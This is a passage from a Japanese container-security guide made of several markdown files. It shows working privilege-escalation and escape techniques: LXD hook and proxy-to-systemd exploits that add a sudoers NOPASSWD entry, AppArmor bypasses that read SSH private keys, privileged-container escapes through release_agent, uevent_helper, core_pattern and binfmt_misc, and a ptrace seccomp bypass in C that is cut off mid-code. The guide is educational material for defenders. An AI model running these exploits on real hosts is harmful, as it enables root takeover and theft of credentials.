root:*:18444:0:99999:7:::
...
```

ただし、rootless docker のようにコンテナを root 以外で動かしている場合は、一般ユーザー権限でコンテナを作成するため、この攻撃を緩和することができます。

```sh
ubuntu@rootless-docker:~$ docker run --rm -it -v /:/hostfs ubuntu:latest bash
root@0e55694c273c:/# cat /hostfs/etc/shadow
cat: /hostfs/etc/shadow: Permission denied
```

## lxd グループへの追加

LXD の場合、ユーザーを `lxd` グループに追加することでコンテナの操作が可能になりますが、これも docker 同様に root 権限を与えることと同義です。  

### hook を使った権限昇格

LXC には hook 機能があり、これを利用して root として任意のコマンドを実行できます。

```sh
$ lxc launch images:ubuntu/trusty/amd64 runme -c raw.lxc="lxc.hook.pre-start=sh -c 'echo foo >/runme'"
Creating runme
Starting runme
user@host:~$ ls -l /runme 
-rw-r--r-- 1 root root 5 May  7 10:29 /runme
```

### LXD proxy を利用した権限昇格

LXD の proxy 経由で unix socket にアクセスすると、その資格情報は root になってしまいます。  
これを利用して systemd の socket に接続して任意の service を操作することができます。

例えば次のような unix socket でやり取りを行うプログラムを起動します。

```sh
$ cat echo.py
import socket
import struct

def main():
    """Echo UNIX peercreds"""
    listen_sock = '/tmp/echo.sock'
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.bind(listen_sock)
    sock.listen()

    while True:
        print('waiting for a connection')
        connection = sock.accept()[0]
        peercred = connection.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED,
                                         struct.calcsize("3i"))
        pid, uid, gid = struct.unpack("3i", peercred)

        print("PID: {}, UID: {}, GID: {}".format(pid, uid, gid))

        continue

if __name__ == '__main__':
    main()

$ python3 echo.py
waiting for a connection
# nc -U /tmp/echo.sock でつなぐと、その UID, GID が表示される
PID: 15373, UID: 1001, GID: 1001
```

LXD proxy を用意して root で接続されるかを確認します。次のコマンドでコンテナ内の `/tmp/proxy.sock` からホストの `/tmp/echo.sock` に接続できます。

```sh
$ lxc config device add test proxy_sock proxy connect=unix:/tmp/echo.sock listen=unix:/tmp/proxy.sock bind=container mode=0777
Device proxy_sock added to test
```

同様に接続すると root になっていることがわかります。

```sh
$ lxc exec test -- sudo --user ubuntu --login
ubuntu@test:~$ nc -U /tmp/proxy.sock

$ python3 test.py
...
PID: 14988, UID: 0, GID: 0
```

これも lxd が root で動いていることが理由です。

```sh
$ ps aux | grep 14988
root     14988  0.0  0.7 1230076 30576 ?       Ssl  03:54   0:00 /snap/lxd/current/bin/lxd forkproxy -- 14522 -1 unix:/tmp/proxy.sock 13977 -1 unix:/var/lib/snapd/hostfs/tmp/echo.sock /var/snap/lxd/common/lxd/logs/test/proxy.proxy_sock.log /var/snap/lxd/common/lxd/devices/test/proxy.proxy_sock   0777
```

これを利用して systemd の socket と通信することで任意コード実行につなげることができます。  
systemd が利用する `/run/systemd/private` をコンテナ内の `/tmp/container_sock` に bind し、さらにそれをホスト側に bind することで、コンテナに入らずとも接続できるようにします。

```sh
lowpriv@vagrant:~$ lxc config device add test container_sock proxy connect=unix:/run/systemd/private listen=unix:/tmp/container_sock bind=container mode=0777
Device container_sock added to test
lowpriv@vagrant:~$ lxc config device add test host_sock proxy connect=unix:/tmp/container_sock listen=unix:/tmp/host_sock bind=host mode=0777
Device host_sock added to test
```

自身を sudoers に追加する systemd unit ファイルを作成し、systemd socket を通して実行することで root に権限昇格することができます。

```sh
$ cat /tmp/evil.service
[Unit]
Description=evil
[Service]
Type=oneshot
ExecStart=/bin/sh -c "echo user ALL=\(ALL\) NOPASSWD: ALL >> /etc/sudoers"
[Install]
WantedBy=multi-user.target

$ cat exploit.py
import socket
import sys
import time

AUTH = u'\0AUTH EXTERNAL 30\r\nNEGOTIATE_UNIX_FD\r\nBEGIN\r\n'

LINK = u'l\1\4\1$\0\0\0\1\0\0\0\242\0\0\0\1\1o\0\31\0\0\0/org/freedesktop/systemd1\0\0\0\0\0\0\0\3\1s\0\r\0\0\0LinkUnitFiles\0\0\0\2\1s\0 \0\0\0org.freedesktop.systemd1.Manager\0\0\0\0\0\0\0\0\6\1s\0\30\0\0\0org.freedesktop.systemd1\0\0\0\0\0\0\0\0\10\1g\0\4asbb\0\0\0\0\0\0\0\26\0\0\0\21\0\0\0/tmp/evil.service\0\0\0\0\0\0\0\0\0\0\0'

RELOAD = u'l\1\4\1\0\0\0\0\2\0\0\0\211\0\0\0\1\1o\0\31\0\0\0/org/freedesktop/systemd1\0\0\0\0\0\0\0\3\1s\0\6\0\0\0Reload\0\0\2\1s\0 \0\0\0org.freedesktop.systemd1.Manager\0\0\0\0\0\0\0\0\6\1s\0\30\0\0\0org.freedesktop.systemd1\0\0\0\0\0\0\0\0'

START = u'l\1\4\1 \0\0\0\1\0\0\0\240\0\0\0\1\1o\0\31\0\0\0/org/freedesktop/systemd1\0\0\0\0\0\0\0\3\1s\0\t\0\0\0StartUnit\0\0\0\0\0\0\0\2\1s\0 \0\0\0org.freedesktop.systemd1.Manager\0\0\0\0\0\0\0\0\6\1s\0\30\0\0\0org.freedesktop.systemd1\0\0\0\0\0\0\0\0\10\1g\0\2ss\0\f\0\0\0evil.service\0\0\0\0\7\0\0\0replace\0'

def send_msg(sock_name, msg):
    client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client_sock.connect(sock_name)

    try:
        client_sock.sendall(AUTH.encode('latin-1'))
        reply = client_sock.recv(8192).decode("latin-1")
        print(reply)

        client_sock.sendall(msg.encode('latin-1'))
        reply = client_sock.recv(8192).decode("latin-1")

        print(reply)
    except:
        print("Connection reset...")

def main():

    for msg in [LINK, RELOAD, START]:
        send_msg(sys.argv[1], msg)
        time.sleep(1)

if __name__ == '__main__':
    main()

$ python3 exploit.py
OK c00157aa91bf4b70a9fcbe8e556ca3c1
AGREE_UNIX_FD

lo/org/freedesktop/systemd1s org.freedesktop.systemd1.ManagersUnitFilesChangedsorg.freedesktop.systemd1lR<usorg.freedesktop.systemdga(sss)Jsymlink /etc/systemd/system/evil.service/tmp/evil.service
OK 95eb8e05ae1647c7ba5aae363557ff5d
AGREE_UNIX_FD

lo/org/freedesktop/systemd1s org.freedesktop.systemd1.Managers  Reloadingsorg.freedesktop.systemdgb
OK 92f3058be4c74bf5a7f05a16182f393a
AGREE_UNIX_FD

lY¶o-/org/freedesktop/systemd1/unit/evil_2eservicesorg.freedesktop.DBus.PropertiessPropertiesChangedsorg.freedesktop.systemdsa{sv}as org.freedesktop.systemd1.Service¼MainPIDu
ControlPIDu
StatusTexts
           StatusErrnoiResults  exit-codeUIDuÿÿÿÿGIDuÿÿÿÿ       NRestartsuExecMainStartTimestamptØ
©ExecMainStartTimestampMonotonictÔOÔ
©ExecMainExitTimestampMonotonictîÔ

ExecMainPIDu^?
              ExecMainCodeiExecMainStatusii
ExecStartPost                              ExecStartPre ExecStart
ExecReloaExecStop
                 ExecStopPost

$ sudo su
root@host:~/# id
uid=0(root) gid=0(root) groups=0(root)
```


================================================
FILE: source/security/apparmor-bypass.md
================================================
# AppArmor のバイパス方法

AppArmor は記法が複雑であるため、バイパス可能なルールを記述してしまうケースがあります。  
ここでは、いくつかそれらの例を示したいと思います。

## 親ディレクトリを rename する

次のように `mybash` が `.ssh/` 配下のファイルを操作できないようなルールを記述します。

```c
#include <tunables/global>

/home/ubuntu/mybash {
  #include <abstractions/base>
  file,

  deny /home/ubuntu/.ssh/** mrwklx,
}
```

一見問題が無いように見えますが、 `.ssh` を rename することでバイパスできます。

```sh
ubuntu@sandbox:~$ cat .ssh/id_rsa
cat: .ssh/id_rsa: Permission denied
ubuntu@sandbox:~$ mv .ssh .sshx
ubuntu@sandbox:~$ head .sshx/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEApQusoFpwaUZ9k8Y8b521n76ImX85uGTtrnMLTK2XDkp+AEj/
```

## shebang を使った bypass

次のように mybash で perl の実行を禁止するとします。

```c
#include <tunables/global>

/home/ubuntu/mybash {
  #include <abstractions/base>
  file,

  deny /usr/bin/perl mrwlx,
}
```

この場合 shebang を使うことで perl の実行が可能です。

```sh
ubuntu@sandbox:~$ cat test.pl
#!/usr/bin/perl

print("hello\n")
ubuntu@sandbox:~$ perl ./test.pl
mybash: /usr/bin/perl: Permission denied
ubuntu@sandbox:~$ ./test.pl
hello
```


================================================
FILE: source/security/breakout-to-host.md
================================================
# ホストへのエスケープ

コンテナからホスト側にエスケープできることを、コンテナという牢獄から脱出することから「Breakout」「Jailbreak」などと呼ばれることがあります。  
ここではコンテナからホスト側への Breakout の手法について紹介します。

## Privileged Container

Privileged (特権)コンテナはホスト上の全てのデバイスへのアクセスを許可するだけでなく、AppArmor などの LSM を適用せず、Capability も過剰に与えてしまうため、適切に Isolation されていないホストのプロセスとほぼ同等のプロセスになります。  
そのため、特権コンテナを侵害された場合はホスト側にエスケープできてしまうので注意が必要です。

Linux の一部機能には任意のプログラムを実行できるヘルパー機能が多数あります。例えば `call_usermodehelper_exec()` のような Linux カーネルからユーザーランドアプリケーションを実行する API などがあります。  
Privileged コンテナのように過剰な Capability を与えると、コンテナの中で特定の操作が可能な場合、この機能を利用してホスト側にエスケープすることができます。  
ここでは、そのような機能を利用してコンテナからホストへエスケープする方法をいくつか紹介します。

## cgroup release_agent

cgourp v1 には cgroup で管理されているプロセスが存在しなくなった場合にカーネルに通知を送る機能があり、その際に release_agent プログラムとしてユーザーランドのプログラムを実行することができます。  
これを利用して例えばコンテナの中で cgroupfs をマウントすることができる場合、次のようにホスト側にエスケープすることができます。

```sh
$ docker run --privileged --rm -it ubuntu:latest bash

root@927bb44baf0d:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# release_agent を有効化する
root@927bb44baf0d:/# echo 1 > /tmp/cgrp/x/notify_on_release

# ホスト側で実行するプログラムを作成
root@927bb44baf0d:/# cat <<EOF > /cmd
> #!/bin/sh
> ps aux > /tmp/output
> EOF
root@927bb44baf0d:/# chmod +x /cmd

# ホスト側からみた実行したいプログラムのファイルパスを release_agent プログラムとして登録
root@927bb44baf0d:/# mount | grep overlay2
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4HN7CVYLX5VML6M3TK4HLNKHX2:/var/lib/docker/overlay2/l/RWN3A47IS5OFAM3BM5YCAOFBYD:/var/lib/docker/overlay2/l/DCI4FWEI5GWG2MAABQGMYNWPTY:/var/lib/docker/overlay2/l/EAP7XMJNE3QFMGS5SOHUTYQPBB,upperdir=/var/lib/docker/overlay2/ed8b2e0d609b87c327e4c6061308d83acca13bc88fe96394b46dd5312af84277/diff,workdir=/var/lib/docker/overlay2/ed8b2e0d609b87c327e4c6061308d83acca13bc88fe96394b46dd5312af84277/work,xino=off)
root@927bb44baf0d:/# echo "/var/lib/docker/overlay2/ed8b2e0d609b87c327e4c6061308d83acca13bc88fe96394b46dd5312af84277/diff/cmd" > /tmp/cgrp/release_agent

root@927bb44baf0d:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# ホスト側でコマンドが実行されたことが確認できる
ubuntu@docker:/tmp$ head /tmp/output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 168656 12660 ?        Ss   Nov02   0:04 /sbin/init
root           2  0.0  0.0      0     0 ?        S    Nov02   0:00 [kthreadd]
```

## uevent_helper

uevent はデバイスが追加 / 削除されたときに送信されるイベントです。その際に、 `/sys/kernel/uevent_helper` に記載されているプログラムを実行します。  
これを利用して次のようにホスト側にエスケープできます。

```sh
ubuntu@docker:~$ docker run --privileged --rm -it ubuntu:latest bash
# ホスト側で実行するプログラムを作成
root@76017d104897:/# cat <<EOF > /cmd
> #!/bin/sh
> ps aux > /tmp/output
> EOF
root@76017d104897:/# chmod +x /cmd

# ホスト側からみた実行したいプログラムのファイルパスを書き込む
root@76017d104897:/# mount | grep overlay2
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/US76JCNP5VCQ2CUZIXYAU2VIQQ:/var/lib/docker/overlay2/l/RWN3A47IS5OFAM3BM5YCAOFBYD:/var/lib/docker/overlay2/l/DCI4FWEI5GWG2MAABQGMYNWPTY:/var/lib/docker/overlay2/l/EAP7XMJNE3QFMGS5SOHUTYQPBB,upperdir=/var/lib/docker/overlay2/bb19048f6e555df3c5387b9a5a14c14fdd592fb97c3bd60ea5925ee75036cecd/diff,workdir=/var/lib/docker/overlay2/bb19048f6e555df3c5387b9a5a14c14fdd592fb97c3bd60ea5925ee75036cecd/work,xino=off)
root@76017d104897:/# echo "/var/lib/docker/overlay2/bb19048f6e555df3c5387b9a5a14c14fdd592fb97c3bd60ea5925ee75036cecd/diff/cmd" > /sys/kernel/uevent_helper

# uevent を発生させる
root@76017d104897:/# echo change > /sys/class/mem/null/uevent

# ホスト側でコマンドが実行されたことが確認できる
ubuntu@docker:/tmp$ head /tmp/output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 168656 12660 ?        Ss   Nov02   0:04 /sbin/init
root           2  0.0  0.0      0     0 ?        S    Nov02   0:00 [kthreadd]
```

## core_pattern

coredump を生成する場合に `/proc/sys/kernel/core_pattern` で出力ファイル名を変更することができますが、 `|` (パイプ) が利用できるため、コマンドの実行が可能になります。  
これを利用して次のような手順でホスト側にエスケープできます。

```sh
ubuntu@docker:~$ docker run --privileged --rm -it ubuntu:latest bash
# ホスト側で実行するプログラムを作成
root@204c6661f442:/# cat <<EOF > /cmd
> #!/bin/sh
> ps aux > /tmp/output
> EOF
root@204c6661f442:/# chmod +x /cmd

# ホスト側からみた実行したいプログラムのファイルパスを書き込む
root@204c6661f442:/# mount | grep overlay2
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/UEAKPG6M42F22YWZ3I7HK3LESS:/var/lib/docker/overlay2/l/RWN3A47IS5OFAM3BM5YCAOFBYD:/var/lib/docker/overlay2/l/DCI4FWEI5GWG2MAABQGMYNWPTY:/var/lib/docker/overlay2/l/EAP7XMJNE3QFMGS5SOHUTYQPBB,upperdir=/var/lib/docker/overlay2/6acd5e8aa79a341ec8c970a77d9993617a7414b7c0e86fc719d1d54c718cc3d0/diff,workdir=/var/lib/docker/overlay2/6acd5e8aa79a341ec8c970a77d9993617a7414b7c0e86fc719d1d54c718cc3d0/work,xino=off)
root@204c6661f442:/# echo "|/var/lib/docker/overlay2/6acd5e8aa79a341ec8c970a77d9993617a7414b7c
0e86fc719d1d54c718cc3d0/diff/cmd" > /proc/sys/kernel/core_pattern

# プロセスを作り、SEGV させる
root@204c6661f442:/# sleep 100 &
[1] 16
root@204c6661f442:/# kill -SEGV 16
root@204c6661f442:/#
[1]+  Segmentation fault      (core dumped) sleep 100

# ホスト側でコマンドが実行されたことが確認できる
ubuntu@docker:/# head /tmp/output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 168940 13144 ?        Ss   Nov13   0:05 /sbin/init
root           2  0.0  0.0      0     0 ?        S    Nov13   0:00 [kthreadd]
```

## binfmt_misc

`/proc/sys/fs/binfmt_misc` は指定したマジックナンバーや拡張子のファイルを実行する際に、指定のプログラム(インタプリタ)を実行することができます。  
これを利用することで次のようにホスト側にエスケープできます。

```sh
ubuntu@docker:~$ docker run --privileged --rm -it ubuntu:latest bash
# binfmt_misc をマウント
root@4af543b9eb3f:/# mount binfmt_misc -t binfmt_misc /proc/sys/fs/binfmt_misc

# ホスト側で実行するプログラムを作成
root@4af543b9eb3f:/# cat <<EOF >/cmd
> #!/bin/sh
> ps aux > /tmp/output
> EOF
root@4af543b9eb3f:/# chmod +x /cmd

# .sh という拡張子のプログラムが実行されると cmd が実行するようにする
root@4af543b9eb3f:/# mount | grep overlay2
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/MVSWHTODE2R4PLCNOXNJ7MEHNX:/var/lib/docker/overlay2/l/RWN3A47IS5OFAM3BM5YCAOFBYD:/var/lib/docker/overlay2/l/DCI4FWEI5GWG2MAABQGMYNWPTY:/var/lib/docker/overlay2/l/EAP7XMJNE3QFMGS5SOHUTYQPBB,upperdir=/var/lib/docker/overlay2/f5cbdf158d44a4e44969eab02661e22c0886d7695e216b4590115f35d4e7cc3f/diff,workdir=/var/lib/docker/overlay2/f5cbdf158d44a4e44969eab02661e22c0886d7695e216b4590115f35d4e7cc3f/work,xino=off)
root@4af543b9eb3f:/# echo ':evil:E::sh::/var/lib/docker/overlay2/f5cbdf158d44a4e44969eab02661e22c0886d7695e216b4590115f35d4e7cc3f/diff/cmd:OC' > /proc/sys/fs/binfmt_misc/register

# ホスト側で .sh 拡張子をもつファイルを実行すると cmd が実行される
ubuntu@docker:~$ /tmp/test.sh
ubunty@docker:~# head /tmp/output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 168940 13144 ?        Ss   Nov13   0:05 /sbin/init
root           2  0.0  0.0      0     0 ?        S    Nov13   0:00 [kthreadd]
...
```


================================================
FILE: source/security/image/README.md
================================================


================================================
FILE: source/security/image/scanner.md
================================================
# イメージスキャン

Docker イメージにはアプリケーションの動作に必要なソフトウェアが含まれており、それらに脆弱性が存在することがあります。  
コンテナに限らず、オンプレやVMでも同様ですが、それらの脆弱性を利用されて権限昇格されることもあります。そのため、イメージに含まれる脆弱性の把握とリスク管理を行う必要があります。

ここではイメージをスキャンして脆弱性を把握するためのツールを紹介します。

## trivy

* https://github.com/aquasecurity/trivy

trivy[^1] はイメージを静的解析し、主要OSのパッケージに加えて bundler や npm などでインストールされているアプリケーションパッケージもスキャン対象に含めることができます。  
他のイメージスキャナと比較して誤検知の少なさなど、正確性も売りとなっています。

```sh
$ trivy ubuntu:latest

ubuntu:latest (ubuntu 20.04)
============================
Total: 20 (UNKNOWN: 0, LOW: 18, MEDIUM: 2, HIGH: 0, CRITICAL: 0)

+-------------+------------------+----------+------------------------+-------------------+--------------------------------+
|   LIBRARY   | VULNERABILITY ID | SEVERITY |   INSTALLED VERSION    |   FIXED VERSION   |             TITLE              |
+-------------+------------------+----------+------------------------+-------------------+--------------------------------+
| bash        | CVE-2019-18276   | LOW      | 5.0-6ubuntu1.1         |                   | bash: when effective UID is    |
|             |                  |          |                        |                   | not equal to its real UID      |
|             |                  |          |                        |                   | the...                         |
+-------------+------------------+          +------------------------+-------------------+--------------------------------+
| coreutils   | CVE-2016-2781    |          | 8.30-3ubuntu2          |                   | coreutils: Non-privileged      |
|             |                  |          |                        |                   | session can escape to the      |
|             |                  |          |                        |                   | parent session in chroot       |
+-------------+------------------+          +------------------------+-------------------+--------------------------------+
| gpgv        | CVE-2019-13050   |          | 2.2.19-3ubuntu2        |                   | GnuPG: interaction between the |
|             |                  |          |                        |                   | sks-keyserver code and GnuPG   |
|             |                  |          |                        |                   | allows for a Certificate...    |
+-------------+------------------+          +------------------------+-------------------+--------------------------------+
| libc-bin    | CVE-2016-10228   |          | 2.31-0ubuntu9.1        |                   | glibc: iconv program can       |
|             |                  |          |                        |                   | hang when invoked with the -c  |
|             |                  |          |                        |                   | option                         |
+             +------------------+          +                        +-------------------+--------------------------------+
|             | CVE-2020-6096    |          |                        |                   | glibc: signed comparison       |
|             |                  |          |                        |                   | vulnerability in the ARMv7     |
|             |                  |          |                        |                   | memcpy function                |
+-------------+------------------+          +                        +-------------------+--------------------------------+
...
```

## snyk

[snyk](snyk.io) はアプリケーションライブラリの脆弱性DBを持ち、検知するツールを提供しています。Docker のイメージスキャンに snyk が利用されるようになり、Docker 2.3.6.0 以降は `docker scan` コマンドだけでイメージスキャンが利用できるようになっています。[^2]  

```sh
❯ docker scan ubuntu:latest

Testing ubuntu:latest...

✗ Low severity vulnerability found in tar
  Description: NULL Pointer Dereference
  Info: https://snyk.io/vuln/SNYK-UBUNTU2004-TAR-576242
  Introduced through: meta-common-packages@meta
  From: meta-common-packages@meta > tar@1.30+dfsg-7

✗ Low severity vulnerability found in systemd/libsystemd0
  Description: Improper Input Validation
  Info: https://snyk.io/vuln/SNYK-UBUNTU2004-SYSTEMD-576079
  Introduced through: systemd/libsystemd0@245.4-4ubuntu3.2, apt@2.0.2ubuntu0.1, procps/libprocps8@2:3.3.16-1ubuntu2, util-linux/bsdutils@1:2.34-0.1ubuntu9.1, util-linux/mount@2.34-0.1ubuntu9.1, systemd/libudev1@245.4-4ubuntu3.2
  From: systemd/libsystemd0@245.4-4ubuntu3.2
  From: apt@2.0.2ubuntu0.1 > systemd/libsystemd0@245.4-4ubuntu3.2
  From: procps/libprocps8@2:3.3.16-1ubuntu2 > systemd/libsystemd0@245.4-4ubuntu3.2
  and 6 more...
...
```

## Anchore

* https://github.com/anchore/anchore-engine

Anchore[^3] はイメージの脆弱性を集中管理する機能を持ちます。REST API を通して利用できるためプログラマブルであることが特徴の一つです。

```sh
❯ anchore-cli image add docker.io/library/debian:latest

Image Digest: sha256:60cb30babcd1740309903c37d3d408407d190cf73015aeddec9086ef3f393a5d
Parent Digest: sha256:8414aa82208bc4c2761dc149df67e25c6b8a9380e5d8c4e7b5c84ca2d04bb244
Analysis Status: not_analyzed
Image Type: docker
Analyzed At: None
Image ID: 1510e850178318cd2b654439b56266e7b6cbff36f95f343f662c708cd51d0610
Dockerfile Mode: None
Distro: None
Distro Version: None
Size: None
Architecture: None
Layer Count: None

Full Tag: docker.io/library/debian:latest
Tag Detected At: 2020-11-15T04:23:09Z

❯ anchore-cli image list
Full Tag                               Image Digest                                                                   Analysis Status
docker.io/library/debian:latest        sha256:60cb30babcd1740309903c37d3d408407d190cf73015aeddec9086ef3f393a5d        analyzed
docker.io/library/ubuntu:latest        sha256:1d7b639619bdca2d008eca2d5293e3c43ff84cbee597ff76de3b7a7de3e84956        analyzed

❯ anchore-cli image vuln docker.io/library/debian:latest os
Vulnerability ID        Package                            Severity          Fix         CVE Refs        Vulnerability URL                                                   Type        Feed Group        Package Path
CVE-2011-3389           libgnutls30-3.6.7-4+deb10u5        Medium            None                        https://security-tracker.debian.org/tracker/CVE-2011-3389           dpkg        debian:10         pkgdb
CVE-2005-2541           tar-1.30+dfsg-6                    Negligible        None                        https://security-tracker.debian.org/tracker/CVE-2005-2541           dpkg        debian:10         pkgdb
...
```

# イメージスキャナ自体の脆弱性

イメージスキャナはイメージを静的解析するものと内部で OS コマンドやパッケージマネージャーを実行する動的解析するものがあります。  
動的解析するものにOSコマンドの呼び出しに不備があると、不正なイメージファイルをスキャンさせることで、任意コード実行につなげることができます。

例えば Anchore 0.7 では次のように OS コマンドが呼び出され、そのバリデーションに不備があったため、任意コード実行につなげることができました。

* https://github.com/anchore/anchore-engine/issues/430

中には脆弱性報告されたものの未修正のものもあるため、利用ケースを考えて使用したり、イメージスキャナ自体もアップデートしていく必要があります。[^4]

[^1]: https://github.com/aquasecurity/trivy/
[^2]: https://docs.docker.com/engine/scan/
[^3]: https://github.com/anchore/anchore-engine
[^4]: Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners / https://medium.com/@matuzg/testing-docker-cve-scanners-part-2-5-exploiting-cve-scanners-b37766f73005


================================================
FILE: source/security/image/secrets-in-layer.md
================================================
# イメージレイヤへの機密情報の保持

Docker イメージは OverlayFS のようにレイヤが存在し、ベースとなる OS レイヤに対してアプリケーションやライブラリを追加されたものになっています。

例えば次のような Dockerfile を用意しビルドします。

```sh
$ cat Dockerfile
FROM alpine:latest
RUN echo "secret" > /secret.txt
RUN rm /secret.txt

$ docker build -t test .
Sending build context to Docker daemon  10.61MB
Step 1/3 : FROM alpine:latest
 ---> d6e46aa2470d
Step 2/3 : RUN echo "secret" > /secret.txt
 ---> Running in 32f150d1804c
Removing intermediate container 32f150d1804c
 ---> 2cac5efedab4
Step 3/3 : RUN rm /secret.txt
 ---> Running in be0569fd1744
Removing intermediate container be0569fd1744
 ---> b29dd8898773
Successfully built b29dd8898773
Successfully tagged test:latest
```

この Dockerfile は3つのレイヤで構成されています。

* Layer 1 ... `FROM alpine:latest`
* Layer 2 ... `RUN echo "secret" > /secret.txt`
* Layer 3 ... `RUN rm /secret.txt`

より視覚的に確認するために [dive](https://github.com/wagoodman/dive) を使ってみると、確かに3つのレイヤであることを確認できます。[^1]

```
$ dive test
┃ ● Layers ┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ │ Current Layer Contents ├────────────────────
Cmp   Size  Command                            ├── bin
    5.6 MB  FROM b1c62b187dcd114               │   ├── arch → /bin/busybox
       7 B  echo "secret" > /secret.txt        │   ├── ash → /bin/busybox
       0 B  rm /secret.txt                     │   ├── base64 → /bin/busybox
                                               │   ├── bbconfig → /bin/busybox
│ Layer Details ├───────────────────────────── │   ├── busybox
                                               │   ├── cat → /bin/busybox
Tags:   (unavailable)                          │   ├── chgrp → /bin/busybox
Id:     b1c62b187dcd114a7252e45a4f03577549d822 │   ├── chmod → /bin/busybox
77149b5467c73eefaa956260bd                     │   ├── chown → /bin/busybox
Digest: sha256:ace0eda3e3be35a979cec764a3321b4 │   ├── conspy → /bin/busybox
c7d0b9e4bb3094d20d3ff6782961a8d54              │   ├── cp → /bin/busybox
Command:                                       │   ├── date → /bin/busybox
#(nop) ADD file:f17f65714f703db9012f00e5ec98d0 │   ├── dd → /bin/busybox
b2541ff6147c2633f7ab9ba659d0c507f4 in /        │   ├── df → /bin/busybox
                                               │   ├── dmesg → /bin/busybox
│ Image Details ├───────────────────────────── │   ├── dnsdomainname → /bin/busybox
                                               │   ├── dumpkmap → /bin/busybox
                                               │   ├── echo → /bin/busybox
Total Image size: 5.6 MB                       │   ├── ed → /bin/busybox
Potential wasted space: 7 B                    │   ├── egrep → /bin/busybox
Image efficiency score: 99 %                   │   ├── false → /bin/busybox
                                               │   ├── fatattr → /bin/busybox
```

イメージは各レイヤを保持しているため、特定のレイヤを抽出することができます。  
つまり、`rm /secret.txt` のように Dockerfile 内で機密情報を削除している場合でも、その機密情報を取り出すことが可能です。

```sh
$ docker save test > test.tar
$ mkdir test
$ cd test
~/test$ tar -xf ../test.tar
~/test$ ls
b1c62b187dcd114a7252e45a4f03577549d82277149b5467c73eefaa956260bd       b6433cc45f11a118c68ef34b9b3192f7c3514ee1a36c85d26df80122d058af4a  manifest.json
b29dd88987735c67e31b37de3c0c44abf656b42e6ce396defbfd967ba772e027.json  c8e83ef6a497050f640412539ecd335c4f7cf72808a75aea4ef1d0e04bb28156  repositories

$ cat b29*.json | jq
"history": [
    {
      "created": "2020-10-22T02:19:24.33416307Z",
      "created_by": "/bin/sh -c #(nop) ADD file:f17f65714f703db9012f00e5ec98d0b2541ff6147c2633f7ab9ba659d0c507f4 in / "
    },
    {
      "created": "2020-10-22T02:19:24.499382102Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"/bin/sh\"]",
      "empty_layer": true
    },
    {
      "created": "2020-11-02T09:05:38.780508124Z",
      "created_by": "/bin/sh -c echo \"secret\" > /secret.txt"
    },
    {
      "created": "2020-11-02T09:05:39.890868911Z",
      "created_by": "/bin/sh -c rm /secret.txt"
    }

$ cat manifest.json | jq
...
    "Layers": [
      "b1c62b187dcd114a7252e45a4f03577549d82277149b5467c73eefaa956260bd/layer.tar",
      "c8e83ef6a497050f640412539ecd335c4f7cf72808a75aea4ef1d0e04bb28156/layer.tar",
      "b6433cc45f11a118c68ef34b9b3192f7c3514ee1a36c85d26df80122d058af4a/layer.tar"
...

$ tar xf c8e83ef6a497050f640412539ecd335c4f7cf72808a75aea4ef1d0e04bb28156/layer.tar
$ cat secret.txt
secret
```

上記のようなケースを防ぐために、機密情報は環境変数で渡したりするようにしましょう。[^2][^3]

---

[^1]: https://github.com/wagoodman/dive
[^2]: https://docs.docker.com/engine/swarm/secrets/
[^3]: https://docs.docker.com/develop/develop-images/build_enhancements/


================================================
FILE: source/security/seccomp-bypass.md
================================================
# seccomp のバイパス

seccomp は特定のシステムコール呼び出しを制限する機構ですが、 **Linux Kernel 4.8 まで** は ptrace を使うことでバイパスすることができます。  
これは ptrace トレーサに通知される前（システムコールが呼び出されて実行される前）に seccomp フィルタが適用されるため、seccomp によって検査された後のレジスタを変更することで、制限されているシステムコールを呼び出すことができるという仕組みです。

具体的な手順としては次の通りです。

1. `fork(2)` で子プロセスで禁止されているシステムコールを実行し、親プロセス側でそのシステムコールの監視をする
2. システムコールが呼ばれたら別のシステムコールを呼び出すようにレジスタを書き換える
3. そのシステムコールが呼び出されたら、レジスタ状態を元に戻すことで禁止されたシステムコールを実行できる

コードにすると次の通りです。

```c
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <sys/signal.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <sys/fcntl.h>
#include <syscall.h>


void die (const char *msg)
{
  perror(msg);
  exit(errno);
}

void attack()
{
  int rc;
  
  // mkdir("dir", 0777);
  syscall(SYS_getpid, SYS_mkdir, "dir", 0777); // 引数部分に SYS_mkdir とその引数を与えておく
}

int main()
{
  int pid;
  struct user_regs_struct regs;
  switch( (pid = fork()) ) {
    case -1:  die("Failed fork");
    case 0:
              // 親プロセスにトレースさせる
              ptrace(PTRACE_TRACEME, 0, NULL, NULL);
              kill(getpid(), SIGSTOP);
              attack();
              return 0;
  }

  waitpid(pid, 0, 0);

  while(1) {
    int st;
    // 子プロセスを再開する
    ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
    if (waitpid(pid, &st, __WALL) == -1) {
      break;
    }

    if (!(WIFSTOPPED(st) && WSTOPSIG(st) == SIGTRAP)) {
      break;
    }

    ptrace(PTRACE_GETREGS, pid, NULL, &regs);
    printf("orig_rax = %lld\n", regs.orig_rax);

